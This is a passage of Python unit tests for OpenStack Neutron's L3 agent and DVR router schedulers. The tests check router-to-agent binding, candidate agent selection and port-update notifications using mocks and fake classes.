class FakeL3Scheduler(l3_agent_scheduler.L3Scheduler):
def schedule(self):
pass
def _choose_router_agent(self):
pass
def _choose_router_agents_for_ha(self):
pass
class FakePortDB(object):
def __init__(self, port_list):
self._port_list = port_list
def _get_query_answer(self, port_list, filters):
answers = []
for port in port_list:
matched = True
for key, search_values in filters.items():
port_value = port.get(key, None)
if not port_value:
matched = False
break
if isinstance(port_value, list):
sub_answers = self._get_query_answer(port_value,
search_values)
matched = len(sub_answers) > 0
else:
matched = port_value in search_values
if not matched:
break
if matched:
answers.append(port)
return answers
def get_port(self, context, port_id):
for port in self._port_list:
if port['id'] == port_id:
if port['tenant_id'] == context.tenant_id or context.is_admin:
return port
break
return None
def get_ports(self, context, filters=None):
query_filters = dict()
if filters:
query_filters.update(filters)
if not context.is_admin:
query_filters['tenant_id'] = [context.tenant_id]
result = self._get_query_answer(self._port_list, query_filters)
return result
class L3SchedulerBaseTestCase(base.BaseTestCase):
def setUp(self):
super(L3SchedulerBaseTestCase, self).setUp()
self.scheduler = FakeL3Scheduler()
self.plugin = mock.Mock()
def _test__get_routers_can_schedule(self, routers, agent, target_routers):
self.plugin.get_l3_agent_candidates.return_value = agent
result = self.scheduler._get_routers_can_schedule(
self.plugin, mock.ANY, routers, mock.ANY)
self.assertEqual(target_routers, result)
def test__get_routers_can_schedule_with_compat_agent(self):
routers = [{'id': 'foo_router'}]
self._test__get_routers_can_schedule(routers, mock.ANY, routers)
def test__get_routers_can_schedule_with_no_compat_agent(self):
routers = [{'id': 'foo_router'}]
self._test__get_routers_can_schedule(routers, None, [])
def test__get_candidates_iterable_on_early_returns(self):
plugin = mock.MagicMock()
# non-distributed router already hosted
plugin.get_l3_agents_hosting_routers.return_value = [{'id': 'a1'}]
router = {'distributed': False, 'id': 'falafel'}
iter(self.scheduler._get_candidates(plugin, mock.MagicMock(), router))
# distributed router but no agents
router['distributed'] = True
plugin.get_l3_agents.return_value = []
iter(self.scheduler._get_candidates(plugin, mock.MagicMock(), router))
self.assertFalse(plugin.get_l3_agent_candidates.called)
def test__get_candidates_skips_get_l3_agent_candidates_if_dvr_scheduled(
self):
plugin = mock.MagicMock()
# distributed router already hosted
plugin.get_l3_agents_hosting_routers.return_value = [{'id': 'a1'}]
router = {'distributed': True, 'id': uuidutils.generate_uuid()}
plugin.get_l3_agents.return_value = ['a1']
self.scheduler._get_candidates(plugin, mock.MagicMock(), router)
self.assertFalse(plugin.get_l3_agent_candidates.called)
class L3SchedulerBaseMixin(object):
def _register_l3_agents(self, plugin=None):
self.agent1 = helpers.register_l3_agent(
'host_1', constants.L3_AGENT_MODE_LEGACY)
self.agent_id1 = self.agent1.id
self.agent2 = helpers.register_l3_agent(
'host_2', constants.L3_AGENT_MODE_LEGACY)
self.agent_id2 = self.agent2.id
def _register_l3_dvr_agents(self):
self.l3_dvr_agent = helpers.register_l3_agent(
HOST_DVR, constants.L3_AGENT_MODE_DVR)
self.l3_dvr_agent_id = self.l3_dvr_agent.id
self.l3_dvr_snat_agent = helpers.register_l3_agent(
HOST_DVR_SNAT, constants.L3_AGENT_MODE_DVR_SNAT)
self.l3_dvr_snat_id = self.l3_dvr_snat_agent.id
def _set_l3_agent_admin_state(self, context, agent_id, state=True):
update = {'agent': {'admin_state_up': state}}
self.plugin.update_agent(context, agent_id, update)
def _set_l3_agent_dead(self, agent_id):
update = {
'agent': {
'heartbeat_timestamp':
timeutils.utcnow() - datetime.timedelta(hours=1)}}
self.plugin.update_agent(self.adminContext, agent_id, update)
@contextlib.contextmanager
def router_with_ext_gw(self, name='router1', admin_state_up=True,
fmt=None, tenant_id=None,
external_gateway_info=None,
subnet=None, **kwargs):
tenant_id = tenant_id or self._tenant_id
router = self._make_router(fmt or self.fmt, tenant_id, name,
admin_state_up, external_gateway_info,
**kwargs)
self._add_external_gateway_to_router(
router['router']['id'],
subnet['subnet']['network_id'])
yield router
self._remove_external_gateway_from_router(
router['router']['id'], subnet['subnet']['network_id'])
self._delete('routers', router['router']['id'])
class L3SchedulerTestBaseMixin(object):
def _test_add_router_to_l3_agent(self,
distributed=False,
already_scheduled=False,
external_gw=None):
agent_id = self.agent_id1
agent = self.agent1
if distributed:
self._register_l3_dvr_agents()
agent_id = self.l3_dvr_snat_id
agent = self.l3_dvr_snat_agent
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r1')
router['router']['distributed'] = distributed
router['router']['external_gateway_info'] = external_gw
if already_scheduled:
self._test_schedule_bind_router(agent, router)
with mock.patch.object(self.plugin,
"validate_agent_router_combination"),\
mock.patch.object(self.plugin,
"create_router_to_agent_binding") as auto_s,\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=router['router']):
self.plugin.add_router_to_l3_agent(self.adminContext, agent_id,
router['router']['id'])
self.assertNotEqual(already_scheduled, auto_s.called)
def test__unbind_router_removes_binding(self):
agent_id = self.agent_id1
agent = self.agent1
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r1')
self._test_schedule_bind_router(agent, router)
self.plugin._unbind_router(self.adminContext,
router['router']['id'],
agent_id)
bindings = rb_obj.RouterL3AgentBinding.get_l3_agents_by_router_ids(
self.adminContext, [router['router']['id']])
self.assertEqual(0, len(bindings))
def _create_router_for_l3_agent_dvr_test(self,
distributed=False,
external_gw=None):
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r1')
router['router']['distributed'] = distributed
router['router']['external_gateway_info'] = external_gw
return router
def _prepare_l3_agent_dvr_move_exceptions(self,
distributed=False,
external_gw=None,
agent_id=None,
expected_exception=None):
router = self._create_router_for_l3_agent_dvr_test(
distributed=distributed, external_gw=external_gw)
with mock.patch.object(self.plugin, "create_router_to_agent_binding"),\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=router['router']):
self.assertRaises(expected_exception,
self.plugin.add_router_to_l3_agent,
self.adminContext, agent_id,
router['router']['id'])
def test__schedule_router_skips_unschedulable_routers(self):
mock.patch.object(self.plugin, 'router_supports_scheduling',
return_value=False).start()
scheduler = l3_agent_scheduler.ChanceScheduler()
self.assertIsNone(scheduler._schedule_router(self.plugin,
self.adminContext,
'router_id'))
def test_add_router_to_l3_agent_mismatch_error_dvr_to_legacy(self):
self._register_l3_agents()
self._prepare_l3_agent_dvr_move_exceptions(
distributed=True,
agent_id=self.agent_id1,
expected_exception=l3agent.RouterL3AgentMismatch)
def test_add_router_to_l3_agent_mismatch_error_legacy_to_dvr(self):
self._register_l3_dvr_agents()
self._prepare_l3_agent_dvr_move_exceptions(
agent_id=self.l3_dvr_agent_id,
expected_exception=l3agent.DVRL3CannotAssignToDvrAgent)
def test_add_router_to_l3_agent_mismatch_error_dvr_to_dvr(self):
self._register_l3_dvr_agents()
self._prepare_l3_agent_dvr_move_exceptions(
distributed=True,
agent_id=self.l3_dvr_agent_id,
expected_exception=l3agent.DVRL3CannotAssignToDvrAgent)
def test_add_router_to_l3_agent_dvr_to_snat(self):
external_gw_info = {
"network_id": uuidutils.generate_uuid(),
"enable_snat": True
}
self._register_l3_dvr_agents()
agent_id = self.l3_dvr_snat_id
router = self._create_router_for_l3_agent_dvr_test(
distributed=True,
external_gw=external_gw_info)
with mock.patch.object(self.plugin,
"validate_agent_router_combination"),\
mock.patch.object(
self.plugin,
"create_router_to_agent_binding") as rtr_agent_binding,\
mock.patch('neutron.db.l3_db.L3_NAT_db_mixin.get_router',
return_value=router['router']):
self.plugin.add_router_to_l3_agent(self.adminContext, agent_id,
router['router']['id'])
rtr_agent_binding.assert_called_once_with(
self.adminContext, mock.ANY, router['router'])
def test_add_router_to_l3_agent(self):
self._test_add_router_to_l3_agent()
def test_add_distributed_router_to_l3_agent(self):
external_gw_info = {
"network_id": uuidutils.generate_uuid(),
"enable_snat": True
}
self._test_add_router_to_l3_agent(distributed=True,
external_gw=external_gw_info)
def test_add_router_to_l3_agent_already_scheduled(self):
self._test_add_router_to_l3_agent(already_scheduled=True)
def test_add_distributed_router_to_l3_agent_already_scheduled(self):
external_gw_info = {
"network_id": uuidutils.generate_uuid(),
"enable_snat": True
}
self._test_add_router_to_l3_agent(distributed=True,
already_scheduled=True,
external_gw=external_gw_info)
def test_remove_router_from_l3_agent_in_dvr_mode(self):
self._register_l3_dvr_agents()
self.assertRaises(l3agent.DVRL3CannotRemoveFromDvrAgent,
self.plugin.remove_router_from_l3_agent,
self.adminContext,
self.l3_dvr_agent_id,
mock.ANY)
def test_remove_router_from_l3_agent_in_dvr_snat_mode(self):
self._register_l3_dvr_agents()
router = self._create_router_for_l3_agent_dvr_test(
distributed=True)
agent_id = self.l3_dvr_snat_id
l3_notifier = mock.Mock()
self.plugin.agent_notifiers = {constants.AGENT_TYPE_L3: l3_notifier}
self.plugin.remove_router_from_l3_agent(self.adminContext, agent_id,
router['router']['id'])
l3_notifier.router_removed_from_agent.assert_called_once_with(
self.adminContext, router['router']['id'],
self.l3_dvr_snat_agent.host)
def _prepare_schedule_dvr_tests(self):
scheduler = l3_agent_scheduler.ChanceScheduler()
agent = agent_obj.Agent(mock.ANY, id=uuidutils.generate_uuid())
agent.admin_state_up = True
agent.heartbeat_timestamp = timeutils.utcnow()
plugin = mock.Mock()
plugin.get_l3_agents_hosting_routers.return_value = []
plugin.get_l3_agents.return_value = [agent]
plugin.get_l3_agent_candidates.return_value = [agent]
return scheduler, agent, plugin
def test_schedule_dvr_router_without_snatbinding_and_no_gw(self):
scheduler, agent, plugin = self._prepare_schedule_dvr_tests()
sync_router = {
'id': 'foo_router_id',
'distributed': True
}
plugin.get_router.return_value = sync_router
with mock.patch.object(scheduler, 'bind_router'),\
mock.patch.object(plugin,
'get_snat_bindings',
return_value=False):
scheduler._schedule_router(
plugin, self.adminContext, 'foo_router_id', None)
expected_calls = [
mock.call.get_router(mock.ANY, 'foo_router_id'),
mock.call.get_l3_agents_hosting_routers(
mock.ANY, ['foo_router_id'], admin_state_up=True),
mock.call.get_l3_agents(mock.ANY, active=True),
mock.call.get_l3_agent_candidates(mock.ANY, sync_router, [agent]),
]
plugin.assert_has_calls(expected_calls)
def test_schedule_router_distributed(self):
scheduler, agent, plugin = self._prepare_schedule_dvr_tests()
sync_router = {
'id': 'foo_router_id',
'distributed': True,
'external_gateway_info': {
'network_id': uuidutils.generate_uuid(),
'enable_snat': True
}
}
plugin.get_router.return_value = sync_router
with mock.patch.object(scheduler, 'bind_router'):
scheduler._schedule_router(
plugin, self.adminContext, 'foo_router_id', None)
expected_calls = [
mock.call.get_router(mock.ANY, 'foo_router_id'),
mock.call.get_l3_agents_hosting_routers(
mock.ANY, ['foo_router_id'], admin_state_up=True),
mock.call.get_l3_agents(mock.ANY, active=True),
mock.call.get_l3_agent_candidates(mock.ANY, sync_router,
[agent]),
]
plugin.assert_has_calls(expected_calls)
def _test_schedule_bind_router(self, agent, router):
ctx = self.adminContext
scheduler = l3_agent_scheduler.ChanceScheduler()
rid = router['router']['id']
scheduler.bind_router(self.plugin, ctx, rid, agent.id)
results = rb_obj.RouterL3AgentBinding.get_objects(ctx, router_id=rid)
self.assertGreater(len(results), 0)
self.assertIn(agent.id, [bind.l3_agent_id for bind in results])
def test_bind_new_router(self):
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r1')
with mock.patch.object(l3_agent_scheduler.LOG, 'debug') as flog:
self._test_schedule_bind_router(self.agent1, router)
self.assertEqual(1, flog.call_count)
args, kwargs = flog.call_args
self.assertIn('is scheduled', args[0])
def test_bind_absent_router(self):
scheduler = l3_agent_scheduler.ChanceScheduler()
# checking that bind_router() is not throwing
# when supplied with router_id of non-existing router
scheduler.bind_router(self.plugin, self.adminContext,
uuidutils.generate_uuid(), self.agent_id1)
def test_bind_existing_router(self):
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
self._test_schedule_bind_router(self.agent1, router)
with mock.patch.object(l3_agent_scheduler.LOG, 'debug') as flog:
self._test_schedule_bind_router(self.agent1, router)
self.assertEqual(1, flog.call_count)
args, kwargs = flog.call_args
self.assertIn('has already been scheduled', args[0])
def _check_get_l3_agent_candidates(
self, router, agent_list, exp_host, count=1):
candidates = self.plugin.get_l3_agent_candidates(self.adminContext,
router, agent_list)
self.assertEqual(count, len(candidates))
if count:
self.assertEqual(exp_host, candidates[0]['host'])
def test_get_l3_agent_candidates_legacy(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
agent_list = [self.agent1, self.l3_dvr_agent]
# test legacy agent_mode case: only legacy agent should be candidate
router['distributed'] = False
exp_host = 'host_1'
self._check_get_l3_agent_candidates(router, agent_list, exp_host)
def test_get_l3_agent_candidates_dvr(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
agent_list = [self.agent1, self.l3_dvr_agent]
# test dvr agent_mode case no candidates
router['distributed'] = True
self.get_subnet_ids_on_router = mock.Mock()
self._check_dvr_serviceable_ports_on_host = mock.Mock(
return_value=True)
self._check_get_l3_agent_candidates(router, agent_list, None, count=0)
def test_get_l3_agent_candidates_dvr_no_vms(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
agent_list = [self.agent1, self.l3_dvr_agent]
router['distributed'] = True
# Test no VMs present case
self.get_subnet_ids_on_router = mock.Mock()
self._check_dvr_serviceable_ports_on_host = mock.Mock(
return_value=False)
self._check_get_l3_agent_candidates(
router, agent_list, HOST_DVR, count=0)
def test_get_l3_agent_candidates_dvr_snat(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
router['distributed'] = True
agent_list = [self.l3_dvr_snat_agent]
self.get_subnet_ids_on_router = mock.Mock()
self._check_dvr_serviceable_ports_on_host = mock.Mock(
return_value=True)
self._check_get_l3_agent_candidates(router, agent_list, HOST_DVR_SNAT)
def test_get_l3_agent_candidates_dvr_snat_no_vms(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
router['distributed'] = True
agent_list = [self.l3_dvr_snat_agent]
self._check_dvr_serviceable_ports_on_host = mock.Mock(
return_value=False)
# Test no VMs present case
self.get_subnet_ids_on_router = mock.Mock()
self._check_dvr_serviceable_ports_on_host.return_value = False
self._check_get_l3_agent_candidates(
router, agent_list, HOST_DVR_SNAT, count=1)
def test_get_l3_agent_candidates_dvr_ha_snat_no_vms(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
router['distributed'] = True
router['ha'] = True
agent_list = [self.l3_dvr_snat_agent]
self.check_ports_exist_on_l3agent = mock.Mock(return_value=False)
# Test no VMs present case
self.check_ports_exist_on_l3agent.return_value = False
self.get_subnet_ids_on_router = mock.Mock(return_value=set())
self._check_get_l3_agent_candidates(
router, agent_list, HOST_DVR_SNAT, count=1)
def test_get_l3_agent_candidates_centralized(self):
self._register_l3_dvr_agents()
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r2')
router['external_gateway_info'] = None
router['id'] = uuidutils.generate_uuid()
# check centralized test case
router['distributed'] = False
agent_list = [self.l3_dvr_snat_agent]
self._check_get_l3_agent_candidates(router, agent_list, HOST_DVR_SNAT)
def test_get_l3_agents_hosting_routers(self):
agent = helpers.register_l3_agent('host_6')
router = self._make_router(self.fmt,
tenant_id=uuidutils.generate_uuid(),
name='r1')
ctx = self.adminContext
router_id = router['router']['id']
self.plugin.router_scheduler.bind_router(self.plugin, ctx,
router_id, agent.id)
agents = self.plugin.get_l3_agents_hosting_routers(ctx,
[router_id])
self.assertEqual([agent.id], [agt.id for agt in agents])
agents = self.plugin.get_l3_agents_hosting_routers(ctx,
[router_id],
admin_state_up=True)
self.assertEqual([agent.id], [agt.id for agt in agents])
self._set_l3_agent_admin_state(ctx, agent.id, False)
agents = self.plugin.get_l3_agents_hosting_routers(ctx,
[router_id])
self.assertEqual([agent.id], [agt.id for agt in agents])
agents = self.plugin.get_l3_agents_hosting_routers(ctx,
[router_id],
admin_state_up=True)
self.assertEqual([], agents)
class L3SchedulerTestCaseMixin(test_l3.L3NatTestCaseMixin,
L3SchedulerBaseMixin,
L3SchedulerTestBaseMixin):
def setUp(self):
self.mock_rescheduling = False
ext_mgr = test_l3.L3TestExtensionManager()
plugin_str = ('neutron.tests.unit.extensions.test_l3.'
'TestL3NatIntAgentSchedulingPlugin')
super(L3SchedulerTestCaseMixin, self).setUp(plugin=plugin_str,
ext_mgr=ext_mgr)
self.adminContext = n_context.get_admin_context()
self.plugin = directory.get_plugin()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.ChanceScheduler'
)
self._register_l3_agents()
class L3AgentChanceSchedulerTestCase(L3SchedulerTestCaseMixin,
test_db_base_plugin_v2.
NeutronDbPluginV2TestCase):
def setUp(self):
super(L3AgentChanceSchedulerTestCase, self).setUp()
# Removes MissingAuthPlugin exception from logs
self.patch_notifier = mock.patch(
'neutron.notifiers.batch_notifier.BatchNotifier._notify')
self.patch_notifier.start()
def test_random_scheduling(self):
random_patch = mock.patch('random.choice')
random_mock = random_patch.start()
def side_effect(seq):
return seq[0]
random_mock.side_effect = side_effect
with self.subnet() as subnet:
self._set_net_external(subnet['subnet']['network_id'])
with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual(1, len(agents))
self.assertEqual(1, random_mock.call_count)
with self.router_with_ext_gw(name='r2', subnet=subnet) as r2:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r2['router']['id']],
admin_state_up=True)
self.assertEqual(len(agents), 1)
self.assertEqual(2, random_mock.call_count)
random_patch.stop()
def test_scheduler_auto_schedule_when_agent_added(self):
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id1, False)
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, False)
with self.subnet() as subnet:
self._set_net_external(subnet['subnet']['network_id'])
with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual(0, len(agents))
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id1, True)
self.plugin.auto_schedule_routers(self.adminContext, 'host_1')
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual('host_1', agents[0]['host'])
class L3AgentLeastRoutersSchedulerTestCase(L3SchedulerTestCaseMixin,
test_db_base_plugin_v2.
NeutronDbPluginV2TestCase):
def setUp(self):
super(L3AgentLeastRoutersSchedulerTestCase, self).setUp()
self.plugin.router_scheduler = importutils.import_object(
'neutron.scheduler.l3_agent_scheduler.LeastRoutersScheduler'
)
def test_scheduler(self):
# disable one agent to force the scheduling to the only one.
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, False)
with self.subnet() as subnet:
self._set_net_external(subnet['subnet']['network_id'])
with self.router_with_ext_gw(name='r1', subnet=subnet) as r1:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r1['router']['id']],
admin_state_up=True)
self.assertEqual(1, len(agents))
agent_id1 = agents[0]['id']
with self.router_with_ext_gw(name='r2', subnet=subnet) as r2:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r2['router']['id']],
admin_state_up=True)
self.assertEqual(1, len(agents))
agent_id2 = agents[0]['id']
self.assertEqual(agent_id1, agent_id2)
# re-enable the second agent to see whether the next router
# spawned will be on this one.
self._set_l3_agent_admin_state(self.adminContext,
self.agent_id2, True)
with self.router_with_ext_gw(name='r3',
subnet=subnet) as r3:
agents = self.plugin.get_l3_agents_hosting_routers(
self.adminContext, [r3['router']['id']],
admin_state_up=True)
self.assertEqual(1, len(agents))
agent_id3 = agents[0]['id']
self.assertNotEqual(agent_id1, agent_id3)
class L3DvrScheduler(l3_db.L3_NAT_db_mixin,
l3_dvrscheduler_db.L3_DVRsch_db_mixin):
pass
class L3DvrSchedulerTestCase(L3SchedulerBaseMixin,
test_db_base_plugin_v2.
NeutronDbPluginV2TestCase):
l3_plugin = ('neutron.tests.unit.extensions.test_l3.'
'TestL3NatAgentSchedulingServicePlugin')
def setUp(self):
if self.l3_plugin:
service_plugins = {
'l3_plugin_name': self.l3_plugin,
'flavors_plugin_name': 'neutron.services.flavors.'
'flavors_plugin.FlavorsPlugin'
}
else:
service_plugins = None
super(L3DvrSchedulerTestCase, self).setUp('ml2',
service_plugins=service_plugins)
self.useFixture(fixture.CallbackRegistryFixture())
self.setup_coreplugin('ml2')
self.adminContext = n_context.get_admin_context()
self.dut = L3DvrScheduler()
self.l3plugin = directory.get_plugin(plugin_constants.L3)
def test__notify_l3_agent_update_port_with_allowed_address_pairs_revert(
self):
port_id = uuidutils.generate_uuid()
context = self.adminContext
port = {
'id': port_id,
'admin_state_up': False,
portbindings.HOST_ID: 'vm-host',
'device_id': 'vm-id',
'allowed_address_pairs': [
{'ip_address': '10.1.0.201',
'mac_address': 'aa:bb:cc:dd:ee:ff'}],
'device_owner': DEVICE_OWNER_COMPUTE, }
original_port = {
'id': port_id,
'admin_state_up': True,
portbindings.HOST_ID: 'vm-host',
'device_id': 'vm-id',
'allowed_address_pairs': [
{'ip_address': '10.1.0.201',
'mac_address': 'aa:bb:cc:dd:ee:ff'}],
'device_owner': DEVICE_OWNER_COMPUTE, }
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, resource_id=port_id, states=(original_port, port,)))
l3plugin._get_allowed_address_pair_fixed_ips.return_value = (
['10.1.0.21'])
self.assertFalse(
l3plugin.update_arp_entry_for_dvr_service_port.called)
l3plugin.delete_arp_entry_for_dvr_service_port.\
assert_called_once_with(
self.adminContext,
original_port,
fixed_ips_to_delete=mock.ANY)
def test__notify_l3_agent_update_port_with_allowed_address_pairs(self):
port_id = uuidutils.generate_uuid()
context = self.adminContext
port = {
'id': port_id,
portbindings.HOST_ID: 'vm-host',
'allowed_address_pairs': [
{'ip_address': '10.1.0.201',
'mac_address': 'aa:bb:cc:dd:ee:ff'}],
'device_id': 'vm-id',
'device_owner': DEVICE_OWNER_COMPUTE,
'admin_state_up': True, }
original_port = {
'id': port_id,
portbindings.HOST_ID: 'vm-host',
'device_id': 'vm-id',
'device_owner': DEVICE_OWNER_COMPUTE,
'admin_state_up': True, }
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, resource_id=port_id, states=(original_port, port,)))
self.assertTrue(
l3plugin.update_arp_entry_for_dvr_service_port.called)
def test__notify_l3_agent_when_unbound_port_migrates_to_bound_host(self):
port_id = 'fake-port'
context = self.adminContext
original_port = {
'id': port_id,
portbindings.HOST_ID: '',
'device_owner': '',
'admin_state_up': True}
port = {
'id': port_id,
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE,
'mac_address': '02:04:05:17:18:19'}
plugin = directory.get_plugin()
l3plugin = mock.MagicMock()
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, plugin,
payload=events.DBEventPayload(
context, resource_id=port_id, states=(original_port, port,)))
l3plugin.dvr_handle_new_service_port.assert_called_once_with(
self.adminContext, port, unbound_migrate=True)
def test__notify_l3_agent_update_port_no_removing_routers(self):
port_id = 'fake-port'
context = self.adminContext
port = None
original_port = {
'id': port_id,
portbindings.HOST_ID: 'vm-host',
'device_id': 'vm-id',
'device_owner': DEVICE_OWNER_COMPUTE,
'mac_address': '02:04:05:17:18:19'}
plugin = directory.get_plugin()
l3plugin = mock.Mock()
l3plugin.supported_extension_aliases = [
'router', constants.L3_AGENT_SCHEDULER_EXT_ALIAS,
constants.L3_DISTRIBUTED_EXT_ALIAS
]
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, plugin,
payload=events.DBEventPayload(
context,
metadata={'mac_address_updated': True},
resource_id=port_id,
states=(original_port, port,)))
self.assertFalse(
l3plugin.update_arp_entry_for_dvr_service_port.called)
self.assertFalse(
l3plugin.dvr_handle_new_service_port.called)
self.assertFalse(l3plugin.remove_router_from_l3_agent.called)
self.assertFalse(l3plugin.get_dvr_routers_to_remove.called)
def test__notify_l3_agent_new_port_action(self):
port_dict = {'device_owner': DEVICE_OWNER_COMPUTE}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_new_port(
resources.PORT, events.AFTER_CREATE, mock.ANY,
payload=events.DBEventPayload(
self.adminContext, states=(port_dict,)))
l3plugin.update_arp_entry_for_dvr_service_port.\
assert_called_once_with(
self.adminContext, port_dict)
l3plugin.dvr_handle_new_service_port.assert_called_once_with(
self.adminContext, port_dict)
def test__notify_l3_agent_new_port_no_action(self):
port_dict = {
'device_owner': constants.DEVICE_OWNER_NETWORK_PREFIX + 'None'}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_new_port(
resources.PORT, events.AFTER_CREATE, mock.ANY,
payload=events.DBEventPayload(
self.adminContext, states=(port_dict,)))
self.assertFalse(
l3plugin.update_arp_entry_for_dvr_service_port.called)
self.assertFalse(
l3plugin.dvr_handle_new_service_port.called)
def test__notify_l3_agent_update_port_with_migration_port_profile(self):
context = self.adminContext
original_port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE,
'id': uuidutils.generate_uuid()}
port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE,
portbindings.PROFILE: {'migrating_to': 'vm-host2'}}
l3plugin = mock.MagicMock()
directory.add_plugin(plugin_constants.L3, l3plugin)
with mock.patch.object(l3plugin, '_get_floatingips_by_port_id',
return_value=[]):
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, states=(original_port, port,)))
l3plugin.dvr_handle_new_service_port.assert_called_once_with(
context, port,
dest_host='vm-host2', router_id=None)
l3plugin.update_arp_entry_for_dvr_service_port.\
assert_called_once_with(
context, port)
def test__notify_l3_agent_update_port_no_action(self):
context = self.adminContext
original_port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE}
port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context, states=(original_port, port,)))
self.assertFalse(
l3plugin.update_arp_entry_for_dvr_service_port.called)
self.assertFalse(
l3plugin.dvr_handle_new_service_port.called)
self.assertFalse(l3plugin.remove_router_from_l3_agent.called)
self.assertFalse(l3plugin.get_dvr_routers_to_remove.called)
def test__notify_l3_agent_update_port_with_mac_address_update(self):
context = self.adminContext
original_port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE,
'mac_address': '02:04:05:17:18:19'}
port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': DEVICE_OWNER_COMPUTE,
'mac_address': '02:04:05:17:18:29'}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context,
metadata={'mac_address_updated': True},
states=(original_port, port,)))
l3plugin.update_arp_entry_for_dvr_service_port.\
assert_called_once_with(
context, port)
self.assertFalse(l3plugin.dvr_handle_new_service_port.called)
def test__notify_l3_agent_update_port_with_ip_update(self):
context = self.adminContext
original_port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': constants.DEVICE_OWNER_ROUTER_GW,
'fixed_ips': [{'ip_address': '1.1.1.1'}],
'mac_address': '02:04:05:17:18:19'
}
port = {
portbindings.HOST_ID: 'vm-host',
'device_owner': constants.DEVICE_OWNER_ROUTER_GW,
'fixed_ips': [{'ip_address': '2.2.2.2'}],
'mac_address': '02:04:05:17:18:19'
}
l3plugin = mock.Mock()
directory.add_plugin(plugin_constants.L3, l3plugin)
l3_dvrscheduler_db._notify_l3_agent_port_update(
resources.PORT, events.AFTER_UPDATE, mock.ANY,
payload=events.DBEventPayload(
context,
metadata={'mac_address_updated': True},
states=(original_port, port,)))
l3plugin.update_arp_entry_for_dvr_service_port.\
assert_called_once_with(
context, port)
